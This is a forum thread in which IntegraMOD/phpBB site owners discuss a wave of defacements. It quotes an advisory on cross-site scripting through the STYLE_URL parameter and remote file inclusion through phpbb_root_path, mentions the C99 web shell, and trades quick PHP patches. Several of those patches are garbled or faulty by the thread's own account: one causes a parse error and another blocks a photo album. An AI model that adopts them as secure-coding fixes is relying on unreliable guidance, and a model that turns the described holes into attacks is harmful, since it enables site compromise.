This should be the code it is in common.php (or should be)

Code: Select all

 if (@ini_get('register_globals') == '1' || strtolower(@ini_get('register_globals')) == 'on'){    // PHP4+ path          $not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS', 'HTTP_SESSION_VARS', 'HTTP_ENV_VARS', 'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');        // Not only will array_merge give a warning if a parameter    // is not an array, it will actually fail. So we check if    // HTTP_SESSION_VARS has been initialised.     if (!isset($HTTP_SESSION_VARS) || !is_array($HTTP_SESSION_VARS))     {         $HTTP_SESSION_VARS = array();     }       // Merge all into one extremely huge array; unset     // this later     $input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS, $HTTP_SESSION_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES);       unset($input['input']);     unset($input['not_unset']);       while (list($var,) = @each($input))     {         if (in_array($var, $not_unset))         {             die('Hacking attempt!');         }         unset($$var);     }       unset($input);}  

Check you version and let me know it common.php contains the above code.
Mike

Yes, that code is there allright...
On both versions 1.4.0 and 1.4.1.

But if that is a "register_globals off" emulator, maybe it needs further improvement to exclude any form of abuse...

I'm pretty sure it is not a hack on IM, simply a compromised host. C99 Shell can copy a file from anywhere on a system to any writable directory on the system. It doesn't have to come through IM or anything in your account for you to get it.

There are two solutions to this. The first one is obfuscation of the normally writable directories. The second is to have a good pre-emptive system installed in IM that looks for unknown files and quarantines them. It can be set to run every few minutes or each time the site is backed up.

Also see my response here: http://integramod.com/forum/viewtopic.php?p=14252#14252

- John

"Michaelo";p="14248" wrote:Check you version and let me know it common.php contains the above code.
Mike

Hey Mike, the code is indeed located in common.php. I am running:
IM v1.4.0-with all patches and fixes applied using premodded files and no mods.
pbpbb v2.021

Hope this helps.

oops, see evolver beat me to it. <img>

"Michaelo";p="14133" wrote:You could also try this... Find any occurrence of

Code: Select all

 if(isset($HTTP_POST_VARS['STYLE_URL']) || isset($HTTP_GET_VARS['STYLE_URL']))  replace with  if(isset($HTTP_POST_VARS['STYLE_URL']) || (int) isset($HTTP_GET_VARS['STYLE_URL']))  And  $style = urldecode((isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] ]);  with  (int) $style = urldecode((isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] : (int) $HTTP_GET_VARS['STYLE_URL']);  

Which file?

"jwernerny";p="14254" wrote:I'm pretty sure it is not a hack on IM, simply a compromised host. C99 Shell can copy a file from anywhere on a system to any writable directory on the system. It doesn't have to come through IM or anything in your account for you to get it.

Your ideas might have some truth in it...
But then I believe that it is just one of the possible methods used for hacking...

If that what you say would be the only way they use to hack IM, then it would also affect every other php-site and not only integraMOD...
So the question you should then ask is:
Are all php-sites (so not only IM) having that many hacking attempts at this time?
Where does it all start?
Is a vulnerability in integraMOD causing access to hackers on all other sites as well? Then we would have an even bigger problem on our hands!!!

"jwernerny";p="14254" wrote:The second is to have a good pre-emptive system installed in IM that looks for unknown files and quarantines them. It can be set to run every few minutes or each time the site is backed up.

And how about new uploaded avatars, downloads, attachements, photo's,...
All being quarantaind??

I am a bit concerned that about one minute after making the changes suggested here my index file was replaced with that turkish thing mentioned earlier.

is someone having a gag here ?

There seems to be a good deal of information on the C99 Shell out there. I remember first finding it on my site a few months ago. I eradicated it and posted a note about it. It looks like it is becoming more common on many machines now. I found a vBulletin site that talks about it. http://forum.mamboserver.com/showthread.php?p=387492 It's got some really good ideas about how to secure things a bit more. (Anyone know if these can be slipped into config.php?)

The C99 Shell in action.... http://www.youtube.com/watch?v=HLw2lY1G3F8&mode=related&search=

Unregistered, just a little type casting to ensure only int can be returned from GET in blocks_imp_style_select.php
Mike

"billmcelligott";p="14259" wrote:I am a bit concerned that about one minute after making the changes suggested here my index file was replaced with that turkish thing mentioned earlier.

is someone having a gag here ?

I have an important question for you:
Did you come to integraMOD2.com by a link on your site to read about this suggested change?

If so, then this is my suggestion to everyone:
Avoid visiting integraMOD by referal on your site!!!!
Because then it seems clear to me that these hackers are taking advantage of the referals to find your site!!!

I allready mentioned that it was a possibility, now it seems to be fact...

thanks mike..

btw, fubie's site hacked as well..

now dont u think they can replace the RC3 Zip with an infected version?

IntegraMOD Cross-Site Scripting and File Inclusion Vulnerabilities

Description:
Some vulnerabilities have been discovered in IntegraMOD, which can be exploited by malicious people to conduct cross-site scripting attacks and to compromise a vulnerable system.

1) Input passed to the "STYLE_URL" parameter in index.php isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2) Input passed to the "phpbb_root_path" parameter in includes/functions_portal.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation of #2 requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 1.4.0. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised and verified.

Read more - http://secunia.com/advisories/20528/

"Unregistered";p="14268" wrote:1) Input passed to the "STYLE_URL" parameter in index.php isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised and verified.

OK now, please help me with this...
I'm just trying to use the info I gathered to point a fix to this...
But I'm not an expert on these things...
I was hoping someone with more skills would do it...

This is the code for the STYLE_URL:
In Includes/functions.php]     // BEGIN Style Select MOD     if ( isset($HTTP_POST_VARS[STYLE_URL]) || isset($HTTP_GET_VARS[STYLE_URL]) )     {                 $style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] : $HTTP_GET_VARS[STYLE_URL] );         if ( $theme = setup_style($style) )         {             setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);             return;         }     }[/code]
And according to this site:
http://www.zend.com/zend/art/art-oertli.php

[size=99px]    $id = (int)$HTTP_GET_VARS['id'];  [/code]
or

Code: Select all

     $id = (int)$_GET['id'];           /* (PHP => v4.1.0) */  

Now you can be sure $id contains an integer. If somebody tried to modify your SQL query by passing a string, the value would simply be 0. Checking strings is a little more difficult. In my opinion, the only professional way to do this is by using regular expressions. I know that many of you try to avoid them but -- believe me -- they are great fun once you got the basic idea. As an example, the variable $i from chapter 2.1. can be verified with this expression]<php>  [/code]
This script will only continue when the $id variable contains a file name starting with some lowercase alphabetic characters and ending with a .html extension. I will not go into regular expression details but I strongly recommend you the book "Mastering Regular Expressions" by Jeffrey E. F. Friedl (O'Reilly).

integer or string?
What do we do with $HTTP_GET_VARS[STYLE_URL]
Change them to (int)$HTTP_GET_VARS[STYLE_URL]

or use ereg??

I don't even know what variables are used... <!-- s]$HTTP_GET_VARS[STYLE_URL][/color]
in there as well...

"Unregistered";p="14268" wrote:2) Input passed to the "phpbb_root_path" parameter in includes/functions_portal.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation of #2 requires that "register_globals" is enabled.

More about [url=http]Coding PHP with register_globals Off[/url]

[size=99px]http://www.php.net/manual/en/function.import-request-variables.php[/url]) or reviewing some of the reader posted comments related to the extract() function ([url=http]http://www.php.net/manual/en/function.extract.php[/url]).

"jwernerny";p="14260" wrote:The C99 Shell in action.... http://www.youtube.com/watch?v=HLw2lY1G3F8&mode=related&search=

Nice video find. I like how they boast "in under 3mins", which is funny because usally it takes less than 2 mins to restore the site back to normal. So whats the point? If they want a forum to dish out their political lingo why dont they just register on my site and utilize my "Politics" forum section. God knows no one else does. <img>

[align=center:1silofoi][url=http]A Present for our Turkish Fanboys[/url][/align:1silofoi]

So am I the only one they've hacked that haven't altered the homepage to "mark their hack"??

I was shut down by my host, apparently they were using my account to send out 4,500+ emails.

I found multiple files added to my integramod, and have updated all code added here as well. I also shut down my forum until we get a handle on this. <img>

The $HTTP_GET_VARS[STYLE_URL] should return an integer this is why I added the (int) $HTTP_GET_VARS[STYLE_URL] type caster in a previous suggestion... In theory if some one tried to set the STYLE_URL to a string value (required by the hackers) the value should be truncated to 0 (zero)...

The way they did this is to call functions.php appending STYLE_URL = 'some script path etc.'... Because I am not in a position to test some of the crack fixes (I don't have an active site using 1.4.0) I have suggested removing the STYLE_URL variable and the associated code... I expect everyone to remove it until I can set up some method of testing...

These are the two main hacks accounting for 99% of the problems....

If you have been hacked: Remove all files, upload from your original source and make the edits from first post and remove the style select block and the code. Also remove the style select code from functions.php.

Don't forget to use a different password for the main admin and all other admins and moderators just in case these have been compromised... and finally don't forget to check you site for unwanted files.

Mike

yes my forum was hacked but not the rc3 file. it's fine and i checked the file hash and it matches.

i have removed my forum untill an answer is found so that i don't endanger my hosting service.

Please edit your functions.php adding the following code to the start... Should be line 22

[align=center:20yxcfic]Code in this post has been update... See first post in this thred[/align]

Code: Select all

 // Belt //if(strstr($phpbb_root_path, '"')){die('Hacking attempt... Details Logged'); exit;}// Braces //if($phpbb_root_path[0] != '.' && $phpbb_root_path[1] != '/' || $phpbb_root_path[0] != '.' && $phpbb_root_path[1] != '.'){           $phpbb_root_path = './';                     die('Hacking attempt... Details Logged'); exit;  }  

This will fix the second hack using functions.php and php_root_path, I may have gone overboard but who cares <img>

Many thanks to pggar for all the testing on this one...

Note with this fix you do not need register_globals off but to be honest the should be OFF as they will disappear in php6

Mike

This last one gave me this:

Parse error: syntax error, unexpected T_STRING in /forum/includes/functions.php on line 25

Think I had a typo... try it now <img>

hi, after i reinstalled the forum from my backup, the site seems to be very slow.. any idea why?

"Michaelo";p="14281" wrote:Please edit your functions.php adding the following code to the start... Should be line 22

Code: Select all

 // Belt //if(strstr($phpbb_root_path, '"')){die('Hacking attempt... Details Logged'); exit;}// Braces //if($phpbb_root_path[0] != '.' && $phpbb_root_path[1] != '/' || $phpbb_root_path[0] != '.' && $phpbb_root_path[1] != '.'){           $phpbb_root_path = './';                     die('Hacking attempt... Details Logged'); exit;  }  

This will fix the second hack using functions.php and php_root_path, I may have gone overboard but who cares <img>

Many thanks to pggar for all the testing on this one...

Note with this fix you do not need register_globals off but to be honest the should be OFF as they will disappear in php6

Mike

This latest fix blocks me out of my main photo album. Putting back original functions.php allows me back in. All other posted fixes are applied without issues.

"Unregistered";p="14290" wrote:hi, after i reinstalled the forum from my backup, the site seems to be very slow.. any idea why?

The cache has to be rebuilt but don't forget to check for any suspicious files...

[quote=""Unknown Ranger";p="14293""]
[quote=""Michaelo";p="14281""]Please edit your functions.php adding the following code to the start... Should be line 22

Code: Select all

 // Belt //if(strstr($phpbb_root_path, '"')){die('Hacking attempt... Details Logged'); exit;}// Braces //if($phpbb_root_path[0] != '.' && $phpbb_root_path[1] != '/' || $phpbb_root_path[0] != '.' && $phpbb_root_path[1] != '.'){           $phpbb_root_path = './';                     die('Hacking attempt... Details Logged'); exit;  }  

This will fix the second hack using functions.php and php_root_path, I may have gone overboard but who cares Might take a little time as I don't have the old album installed...